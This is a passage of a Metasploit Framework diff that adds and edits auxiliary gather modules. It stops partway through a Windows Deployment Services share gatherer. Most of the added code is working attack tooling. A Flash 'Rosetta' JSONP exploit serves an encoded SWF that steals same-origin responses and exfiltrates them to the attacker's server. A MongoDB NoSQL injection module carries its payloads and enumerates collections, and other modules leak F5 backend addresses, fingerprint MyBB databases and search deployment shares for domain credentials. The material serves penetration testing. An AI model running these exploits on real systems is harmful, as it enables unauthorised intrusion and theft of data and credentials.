+      print_status("Scan result saved in #{datastore['OUT_FILE']}")
+      open(datastore['OUT_FILE'], 'w') do |f|
+        f.puts "; IP, Host"
+      end
+    end
     while (true)
       # Spawn threads for each host
+      hosts = Hash.new
       while (tl.length <= @threadnum)
         ip = ar.next_ip
         break if not ip
         tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip|
           begin
+            Rex.sleep(sleep_time)
             query = @res.query(tip)
             query.each_ptr do |addresstp|
               print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}")
+              if datastore['OUT_FILE']
+                open(datastore['OUT_FILE'], 'a') do |f|
+                  f.puts "#{tip.to_s},#{addresstp}"
+                end
+              end
               report_host(
                 :host => tip.to_s,
                 :name => addresstp
               )
+              if !hosts[tip]
+                hosts[tip] = Array.new
+              end
+              hosts[tip].push addresstp
+            end
+            unless hosts[tip].nil? or hosts[tip].empty?
+              report_note(
+               :host => tip.to_s,
+               :type => "RDNS_Record",
+               :data => hosts[tip]
+              )
             end
           rescue ::Interrupt
             raise $!
diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb
index f53eef3a90..fdf092ed90 100644
--- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb
+++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
     })
     if !res
       print_error("#{peer} - Connection failed")
-    elsif res.code == 200 and res.headers["set-cookie"] =~ /DOLSESSID_([a-f0-9]{32})=/
+    elsif res.code == 200 and res.get_cookies =~ /DOLSESSID_([a-f0-9]{32})=/
       return "DOLSESSID_#{$1}=#{token}"
     else
       print_warning("#{peer} - Could not create session cookie")
diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb
index 814d315b16..dcb65dffba 100644
--- a/modules/auxiliary/gather/emc_cta_xxe.rb
+++ b/modules/auxiliary/gather/emc_cta_xxe.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Brandon Perry <bperry.volatile@gmail.com>', #metasploit module
+          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
         ],
       'References'     =>
         [
diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb
new file mode 100644
index 0000000000..a949fa36c5
--- /dev/null
+++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'F5 BigIP Backend Cookie Disclosure',
+      'Description'    => %q{
+        This module identifies F5 BigIP load balancers and leaks backend
+        information through cookies inserted by the BigIP devices.
+      },
+      'Author'         => [ 'Thanat0s <thanspam[at]trollprod.org>' ],
+      'References'     =>
+        [
+          ['URL', 'http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html'],
+          ['URL', 'http://support.f5.com/kb/en-us/solutions/public/7000/700/sol7784.html?sr=14607726']
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to test', '/']),
+        OptInt.new('REQUESTS', [true, 'Number of requests to send to disclose back', 10])
+      ], self.class)
+  end
+
+  def change_endianness(value, size=4)
+    conversion = value
+
+    if size == 4
+      conversion = [value].pack("V").unpack("N").first
+    elsif size == 2
+      conversion = [value].pack("v").unpack("n").first
+    end
+
+    conversion
+  end
+
+  def cookie_decode(cookie_value)
+    back_end = ""
+
+    if cookie_value =~ /(\d{8})\.(\d{5})\./
+      host = $1.to_i
+      port = $2.to_i
+
+      host = change_endianness(host)
+      host = Rex::Socket.addr_itoa(host)
+
+      port = change_endianness(port, 2)
+
+      back_end = "#{host}:#{port}"
+    end
+
+    back_end
+  end
+
+  def get_cookie # request a page and extract a F5 looking cookie.
+    cookie = {}
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => @uri
+    })
+
+    unless res.nil?
+      # Get the SLB session ID, like "TestCookie=2263487148.3013.0000"
+      m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/)
+      unless m.nil?
+        cookie[:id] = (m.nil?) ? nil : m[1]
+        cookie[:value] = (m.nil?) ? nil : m[2]
+      end
+    end
+
+    cookie
+  end
+
+  def run
+    unless datastore['REQUESTS'] > 0
+      print_error("Please, configure more than 0 REQUESTS")
+      return
+    end
+
+    back_ends = []
+    @uri = normalize_uri(target_uri.path.to_s)
+    print_status("#{peer} - Starting request #{@uri}")
+
+    for i in 0...datastore['REQUESTS']
+      cookie = get_cookie() # Get the cookie
+      # If the cookie is not found, stop process
+      if cookie.empty? || cookie[:id].nil?
+        print_error("#{peer} - F5 Server load balancing cookie not found")
+        break
+      end
+
+      # Print the cookie name on the first request
+      if i == 0
+        print_status("#{peer} - F5 Server load balancing cookie \"#{cookie[:id]}\" found")
+      end
+
+      back_end = cookie_decode(cookie[:value])
+      unless back_ends.include?(back_end)
+        print_status("#{peer} - Backend #{back_end} found")
+        back_ends.push(back_end)
+      end
+    end
+
+    # Reporting found backends in database
+    unless back_ends.empty?
+      report_note(
+       :host => rhost,
+       :type => "f5_load_balancer_backends",
+       :data => back_ends
+      )
+    end
+
+  end
+end
diff --git a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb
new file mode 100644
index 0000000000..31ad6011f4
--- /dev/null
+++ b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'open-uri'
+require 'uri'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
+      'Description'    => %q{
+        A website that serves a JSONP endpoint that accepts a custom alphanumeric
+        callback of 1200 chars can be abused to serve an encoded swf payload that
+        steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.
+
+        This module spins up a web server that, upon navigation from a user, attempts
+        to abuse the specified JSONP endpoint URLs by stealing the response from
+        GET requests to STEAL_URLS.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
+        'joev' # msf module
+      ],
+      'References'     =>
+        [
+          ['CVE', '2014-4671'],
+          ['URL', 'http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/'],
+          ['URL', 'https://github.com/mikispag/rosettaflash'],
+          ['URL', 'http://quaxio.com/jsonp_handcrafted_flash_files/']
+        ],
+      'DisclosureDate' => 'Jul 8 2014',
+      'Actions'        => [ [ 'WebServer' ] ],
+      'PassiveActions' => [ 'WebServer' ],
+      'DefaultAction'  => 'WebServer'))
+
+    register_options(
+      [
+        OptString.new('CALLBACK', [ true, 'The name of the callback paramater', 'callback' ]),
+        OptString.new('JSONP_URL', [ true, 'The URL of the vulnerable JSONP endpoint', '' ]),
+        OptBool.new('CHECK', [ true, 'Check first that the JSONP endpoint works', true ]),
+        OptString.new('STEAL_URLS', [ true, 'A comma-separated list of URLs to steal', '' ]),
+        OptString.new('URIPATH', [ true, 'The URI path to serve the exploit under', '/' ])
+      ],
+      self.class)
+  end
+
+  def run
+    if datastore['CHECK'] && check == Msf::Exploit::CheckCode::Safe
+      raise "JSONP endpoint does not allow sufficiently long callback names."
+    end
+
+    unless datastore['URIPATH'] == '/'
+      raise "URIPATH must be set to '/' to intercept crossdomain.xml request."
+    end
+
+    exploit
+  end
+
+  def check
+    test_string = Rex::Text.rand_text_alphanumeric(encoded_swf.length)
+    io = open(exploit_url(test_string))
+    if io.read.start_with? test_string
+      Msf::Exploit::CheckCode::Vulnerable
+    else
+      Msf::Exploit::CheckCode::Safe
+    end
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("Request '#{request.method} #{request.uri}'")
+    if request.uri.end_with? 'crossdomain.xml'
+      print_status "Responding to crossdomain request.."
+      send_response(cli, crossdomain_xml, 'Content-type' => 'text/x-cross-domain-policy')
+    elsif request.uri.end_with? '.log'
+      body = URI.decode(request.body)
+      file = store_loot(
+        "html", "text/plain", cli.peerhost, body, "flash_jsonp_rosetta", "Exfiltrated HTTP response"
+      )
+      url = body.lines.first.gsub(/.*?=/,'')
+      print_good "#{body.length} bytes captured from target #{cli.peerhost} on URL:\n#{url}"
+      print_good "Stored in #{file}"
+    else
+      print_status "Serving exploit HTML"
+      send_response_html(cli, exploit_html)
+    end
+  end
+
+  def exploit_url(data_payload)
+    delimiter = if datastore['JSONP_URL'].include?('?') then '&' else '?' end
+    "#{datastore['JSONP_URL']}#{delimiter}#{datastore['CALLBACK']}=#{data_payload}"
+  end
+
+  def exploit_html
+    ex_url = URI.escape(get_uri.chomp('/')+'/'+Rex::Text.rand_text_alphanumeric(6+rand(20))+'.log')
+    %Q|
+      <!doctype html>
+      <html>
+        <body>
+          <object type="application/x-shockwave-flash" data="#{exploit_url(encoded_swf)}"
+            width=500 height=500>
+            <param name="FlashVars"
+              value="url=#{URI.escape datastore['STEAL_URLS']}&exfiltrate=#{ex_url}" />
+          </object>
+        </body>
+      </html>
+    |
+  end
+
+  # Based off of http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
+  #
+  # Alphanumeric Flash swf applet that steals URLs. Compiled from the following code:
+  #
+  # class X {
+  #   static var app : X;
+  #
+  #   function getURL(url:String) {
+  #     var r:LoadVars = new LoadVars();
+  #     r.onData = function(src:String) {
+  #       if (_root.exfiltrate) {
+  #         var w:LoadVars = new LoadVars();
+  #         w.x = url+"\n"+src;
+  #         w.sendAndLoad(_root.exfiltrate, w, "POST");
+  #       }
+  #     }
+  #     r.load(url, r, "GET");
+  #   }
+  #
+  #   function X(mc) {
+  #     if (_root.url) {
+  #       var urls:Array = _root.url.split(",");
+  #       for (var i in urls) {
+  #         getURL(urls[i]);
+  #       }
+  #     }
+  #   }
+  #
+  #   // entry point
+  #   static function main(mc) {
+  #     app = new X(mc);
+  #   }
+  # }
+  #
+  #
+  #  Compiling the .as using mtasc and swftool:
+  #
+  #  > mtasc.exe -swf out.swf -main -header 800:600:20 exploit.as
+  #  $ swfcombine -d out.swf -o out-uncompressed.swf
+  #  $ rosettaflash --input out-uncompressed.swf --output out-ascii.swf
+  #
+  def encoded_swf
+    "CWSMIKI0hCD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7iiudIbEAt333swW0s" \
+    "sG03sDDtDDDt0333333Gt333swwv3wwwFPOHtoHHvwHHFhH3D0Up0IZUnnnnnnnnnnnn" \
+    "nnnnnnnUU5nnnnnn3Snn7YNqdIbeUUUfV13333sDT133333333WEDDT13s03WVqefXAx" \
+    "oookD8f8888T0CiudIbEAt33swwWpt03sDGDDDwwwtttttwwwGDt33333www033333Gf" \
+    "BDRhHHUccUSsgSkKoe5D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7mNqdIbe1" \
+    "WUUfV133sUUpDDUUDDUUDTUEDTEDUTUE0GUUD133333333sUEe1sfzA87TLx888znN8t" \
+    "8F8fV6v0CiudIbEAtwwWDt03sDG0sDtDDDtwwtGwpttGwwt33333333w0333GDfBDFzA" \
+    "HZYqqEHeYAHtHyIAnEHnHNVEJRlHIYqEqEmIVHlqzfjzYyHqQLzEzHVMvnAEYzEVHMHT" \
+    "HbB2D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtwuDtDtDDtpDGpD" \
+    "DG0sDtwtwDDGDGtGpDDGwG33sptDDDtGDD33333s03sdFPZHyVQflQfrqzfHRBZHAqzf" \
+    "HaznQHzIIHljjVEJYqIbAzvyHwXHDHtTToXHGhwXHDhtwXHDHWdHHhHxLHXaFHNHwXHD" \
+    "Xt7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7iiudIbEAt333wwE0GDtwpDtD" \
+    "DGDGtG033sDDwGpDDGtDt033sDDt3333g3sFPXHLxcZWXHKHGlHLDthHHHLXAGXHLxcG" \
+    "XHLdSkhHxvGXHDxskhHHGhHXCWXHEHGDHLTDHmGDHDxLTAcGlHthHHHDhLtSvgXH7D0U" \
+    "p0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7YNqdIbeV133333333333333333gF03" \
+    "sDeqUfzAoE80CiudIbEAtwwW3sD3w0sDt0wwGDDGpDtptDDtGwwGpDDtDDDGDDD33333" \
+    "sG033gFPHHmODHDHttMWhHhVODHDhtTwBHHhHxUHHksSHoHOTHTHHHHtLuWhHXVODHDX" \
+    "tlwBHHhHDUHXKscHCHOXHtXnOXH4D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn" \
+    "7CiudIbEAtwwuwG333spDtDDGDDDt0333st0GGDDt33333www03sdFPlWJoXHgHOTHTH" \
+    "HHHtLGwhHxfOdHDx4D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtu" \
+    "wttD333swG0wDDDw03333sDt33333sG03sDDdFPtdXvwhHdLGwhHxhGWwDHdlxXdhvwh" \
+    "HdTg7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAt333swwE03GDtD" \
+    "wG0wpDG03sGDDD33333sw033gFPlHtxHHHDxLrkvKwTHLJDXLxAwlHtxHHHDXLjkvKwD" \
+    "HDHLZWBHHhHxmHXgGHVHwXHLHA7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7" \
+    "CiudIbEAtsWt3wGww03GDttwtDDtDtwDwGDwGDttDDDwDtwwtG0GDtGpDDt33333www0" \
+    "33GdFPlHLjDXthHHHLHqeeobHthHHHXDhtxHHHLZafHQxQHHHOvHDHyMIuiCyIYEHWSs" \
+    "gHmHKcskHoXHLHwhHHfoXHLhnotHthHHHLXnoXHLxUfH1D0Up0IZUnnnnnnnnnnnnnnn" \
+    "nnnnUU5nnnnnn3SnnwWNqdIbe133333333333333333WfF03sTeqefXA888ooo04Cx9"
+  end
+
+  def crossdomain_xml
+    %Q|
+      <?xml version="1.0" ?>
+      <cross-domain-policy>
+      <allow-access-from domain="*" />
+      </cross-domain-policy>
+    |
+  end
+
+  def rhost
+    URI.parse(datastore["JSONP_URL"]).host
+  end
+
+end
diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb
index f11c345847..e6875e6d57 100644
--- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb
+++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb
@@ -24,6 +24,11 @@ class Metasploit3 < Msf::Auxiliary
         [
           'kicks4kittens' # Metasploit module
         ],
+      'References' =>
+        [
+          [ 'CVE', '2013-3975' ],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
+        ],
       'DefaultOptions' =>
         {
           'SSL' => true
diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb
index cff9af79e1..80c1f7a1b3 100644
--- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb
+++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb
@@ -23,6 +23,11 @@ class Metasploit3 < Msf::Auxiliary
         [
           'kicks4kittens' # Metasploit module
         ],
+      'References' =>
+        [
+          [ 'CVE', '2013-3977' ],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
+        ],
       'DefaultOptions' =>
         {
           'SSL' => true
diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb
index a8454f211d..d2754274d6 100644
--- a/modules/auxiliary/gather/ibm_sametime_version.rb
+++ b/modules/auxiliary/gather/ibm_sametime_version.rb
@@ -70,6 +70,11 @@ class Metasploit3 < Msf::Auxiliary
         [
           'kicks4kittens' # Metasploit module
         ],
+      'References' =>
+        [
+          [ 'CVE', '2013-3982' ],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
+        ],
       'DefaultOptions' =>
         {
           'SSL' => true
diff --git a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
new file mode 100644
index 0000000000..e01d173f2d
--- /dev/null
+++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
@@ -0,0 +1,152 @@
+##
+## This module requires Metasploit: http//metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MongoDB NoSQL Collection Enumeration Via Injection",
+      'Description'    => %q{
+      This module can exploit NoSQL injections on MongoDB versions less than 2.4
+      and enumerate the collections available in the data via boolean injections.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        ['Brandon Perry <bperry.volatile[at]gmail.com>'],
+      'References'     =>
+        [
+          ['URL', 'http://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-node-js-server-side-javascript']
+        ],
+      'Platform'       => ['linux', 'win'],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jun 7 2014"))
+
+      register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Full vulnerable URI with [NoSQLi] where the injection point is', '/index.php?age=50[NoSQLi]'])
+      ], self.class)
+  end
+
+  def syntaxes
+    [["\"'||this||'", "'||[inject]||'"],
+     ["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
+     ['\'"||this||"','"||[inject]||"'],
+     ['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
+     ["||this","||[inject]"]]
+  end
+
+  def run
+    uri = datastore['TARGETURI']
+
+    res = send_request_cgi({
+      'uri' => uri.sub('[NoSQLi]', '')
+    })
+
+    if !res
+      fail_with("Server did not respond in an expected way.")
+    end
+
+    pay = ""
+    fals = res.body
+    tru = nil
+
+    syntaxes.each do |payload|
+      print_status("Testing " + payload[0])
+      res = send_request_cgi({
+        'uri' => uri.sub('[NoSQLi]', payload[0])
+      })
+
+      if res and res.body != fals and res.code == 200
+        print_status("Looks like " + payload[0] + " works")
+        tru = res.body
+
+        res = send_request_cgi({
+          'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
+        })
+
+        if res and res.body != tru and res.code == 200
+          vprint_status("I think I confirmed with a negative test.")
+          fals = res.body
+          pay = payload[1]
+          break
+        end
+      end
+    end
+
+    if pay == ''
+      fail_with("Couldn't detect a payload, maybe it isn't injectable.")
+    end
+
+    length = 0
+    vprint_status("Getting length of the number of collections.")
+    (0..100).each do |len|
+      str = "db.getCollectionNames().length==#{len}"
+      res = send_request_cgi({
+        'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
+      })
+
+      if res and res.body == tru
+        length = len
+        print_status("#{len} collections are available")
+        break
+      end
+    end
+
+    vprint_status("Getting collection names")
+
+    names = []
+    (0...length).each do |i|
+      vprint_status("Getting length of name for collection " + i.to_s)
+
+      name_len = 0
+      (0..100).each do |k|
+        str = "db.getCollectionNames()[#{i}].length==#{k}"
+        res = send_request_cgi({
+          'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
+        })
+
+        if res and res.body == tru
+          name_len = k
+          print_status("Length of collection #{i}'s name is #{k}")
+          break
+        end
+      end
+
+      vprint_status("Getting collection #{i}'s name")
+
+      name = ''
+      (0...name_len).each do |k|
+        [*('a'..'z'),*('0'..'9'),*('A'..'Z'),'.'].each do |c|
+          str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
+          res = send_request_cgi({
+            'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
+          })
+
+          if res and res.body == tru
+            name << c
+            break
+          end
+        end
+      end
+
+      print_status("Collections #{i}'s name is " + name)
+      names << name
+    end
+
+    p = store_loot("mongo_injection.#{datastore['RHOST']}_collections",
+                   "text/plain",
+                   nil,
+                   names.to_json,
+                   "mongo_injection_#{datastore['RHOST']}.txt",
+                   "#{datastore["RHOST"]} MongoDB Javascript Injection Collection Enumeration")
+
+    print_good("Your collections are located at: " + p)
+  end
+end
diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb
new file mode 100644
index 0000000000..a2beedb07c
--- /dev/null
+++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'MyBB Database Fingerprint',
+      'Description' => %q{
+        This module checks if MyBB is running behind an URL. Also uses a malformed query to
+        force an error and fingerprint the backend database used by MyBB on version 1.6.12
+        and prior.
+      },
+      'Author'      =>
+        [
+          #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
+          'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module
+        ],
+      'License'     => MSF_LICENSE,
+      'DisclosureDate' => 'Feb 13 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum'])
+      ], self.class)
+  end
+
+  def check
+  begin
+    uri = normalize_uri(target_uri.path, 'index.php')
+    res = send_request_cgi(
+      {
+        'method'  => 'GET',
+        'uri'     => uri,
+        'vars_get' => {
+          'intcheck' => 1
+          }
+      })
+
+    if res.nil? || res.code != 200
+      return Exploit::CheckCode::Unknown
+    end
+
+    #Check PhP
+    php_version = res['X-Powered-By']
+    if php_version
+      php_version = "#{php_version}"
+    else
+      php_version = "PHP version unknown"
+    end
+
+    #Check Web-Server
+    web_server = res['Server']
+    if web_server
+      web_server = "#{web_server}"
+    else
+      web_server = "unknown web server"
+    end
+
+    #Check forum MyBB
+    if res.body.match("&#077;&#089;&#066;&#066;")
+      print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  rescue
+    return Exploit::CheckCode::Unknown
+  end
+
+  end
+
+
+  def run
+    print_status("#{peer} - Checking MyBB...")
+    unless check == Exploit::CheckCode::Detected
+      print_error("#{peer} - MyBB not found")
+      return
+    end
+
+    print_status("#{peer} - Checking database...")
+    uri = normalize_uri(target_uri.path, 'memberlist.php')
+    response = send_request_cgi(
+      {
+        'method'  => 'GET',
+        'uri'     => uri,
+        'vars_get' => {
+          'letter' => -1
+          }
+      })
+    if response.nil?
+      print_error("#{peer} - Timeout...")
+      return
+    end
+
+    #Resolve response
+    if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
+      print_good("#{peer} - Running PostgreSQL Database")
+    elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
+      print_good("#{peer} - Running SQLite Database")
+    else
+      print_status("#{peer} - Running MySQL or unknown database")
+    end
+  end
+end
diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
index 346b202807..19f399a3bb 100644
--- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb
+++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary
 
     users_table = Rex::Ui::Text::Table.new(
       'Header'  => 'vBulletin Users',
-      'Ident'   => 1,
+      'Indent'   => 1,
       'Columns' => ['Username', 'Password Hash', 'Salt']
     )
 
diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb
new file mode 100644
index 0000000000..3811d39650
--- /dev/null
+++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb
@@ -0,0 +1,232 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/dcerpc'
+require 'rex/parser/unattend'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SMB
+  include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows Deployment Services Unattend Gatherer',
+      'Description'    => %q{
+          This module will search remote file shares for unattended installation files that may contain
+          domain credentials. This is often used after discovering domain credentials with the
+          auxilliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
+          have domain credentials. This module will connect to the RemInst share and any Microsoft
+          Deployment Toolkit shares indicated by the share name comments.
+      },
+      'Author'         => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],
+          [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'],
+        ],
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(445),
+        OptString.new('SMBDomain', [ false, "SMB Domain", '']),
+      ], self.class)
+
+    deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion')
+  end
+
+  # Determine the type of share based on an ID type value
+  def share_type(val)
+    stypes = %W{ DISK PRINTER DEVICE IPC SPECIAL TEMPORARY }
+    stypes[val] || 'UNKNOWN'
+  end
+
+
+  # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC
+  # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed!
+  def srvsvc_netshareenum
+    shares = []
+    handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"])
+
+    begin
+      dcerpc_bind(handle)
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+      print_error("#{rhost} : #{e.message}")
+      return
+    end
+
+    stubdata =
+      NDR.uwstring("\\\\#{rhost}") +
+      NDR.long(1)  #level
+
+    ref_id = stubdata[0,4].unpack("V")[0]
+    ctr = [1, ref_id + 4 , 0, 0].pack("VVVV")
+
+    stubdata << ctr
+    stubdata << NDR.align(ctr)
+    stubdata << [0xffffffff].pack("V")
+    stubdata << [ref_id + 8, 0].pack("VV")
+
+    response = dcerpc.call(0x0f, stubdata)
+
+    # Additional error handling and validation needs to occur before
+    # this code can be moved into a mixin
+
+    res = response.dup
+    win_error = res.slice!(-4, 4).unpack("V")[0]
+    if win_error != 0
+      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} Win_error = #{win_error.to_i}")
+    end
+
+    # Level, CTR header, Reference ID of CTR
+    res.slice!(0,12)
+    share_count = res.slice!(0, 4).unpack("V")[0]
+
+    # Reference ID of CTR1
+    res.slice!(0,4)
+    share_max_count = res.slice!(0, 4).unpack("V")[0]
+
+    if share_max_count != share_count
+      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share_max_count did not match share_count")
+    end
+
+    # ReferenceID / Type / ReferenceID of Comment
+    types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]}
+
+    share_count.times do |t|
+      length, offset, max_length = res.slice!(0, 12).unpack("VVV")
+
+      if offset != 0
+        fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share offset was not zero")
+      end
+
+      if length != max_length
+        fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share name max length was not length")
+      end
+
+      name = res.slice!(0, 2 * length)
+      res.slice!(0,2) if length % 2 == 1 # pad
+
+      comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV")
+
+      if comment_offset != 0
+       fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment offset was not zero")
+      end
+
+      if comment_length != comment_max_length
+         fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment max length was not length")
+      end
+
+      comment = res.slice!(0, 2 * comment_length)
+      res.slice!(0,2) if comment_length % 2 == 1 # pad
+
+      shares << [ name, share_type(types[t]), comment]
+    end
+
+    shares
+  end
+
+  def run_host(ip)
+    deploy_shares = []
+
+    begin
+      connect
+      smb_login
+      srvsvc_netshareenum.each do |share|
+        # Ghetto unicode to ascii conversation
+        share_name = share[0].unpack("v*").pack("C*").split("\x00").first
+        share_comm = share[2].unpack("v*").pack("C*").split("\x00").first
+        share_type = share[1]
+
+        if share_type == "DISK" && (share_name == "REMINST" || share_comm == "MDT Deployment Share")
+          vprint_good("#{ip}:#{rport} Identified deployment share #{share_name} #{share_comm}")
+          deploy_shares << share_name
+        end
+      end
+
+      deploy_shares.each do |deploy_share|
+        query_share(deploy_share)
+      end
+
+    rescue ::Interrupt
+      raise $!
+    end
+  end
+
+  def query_share(share)
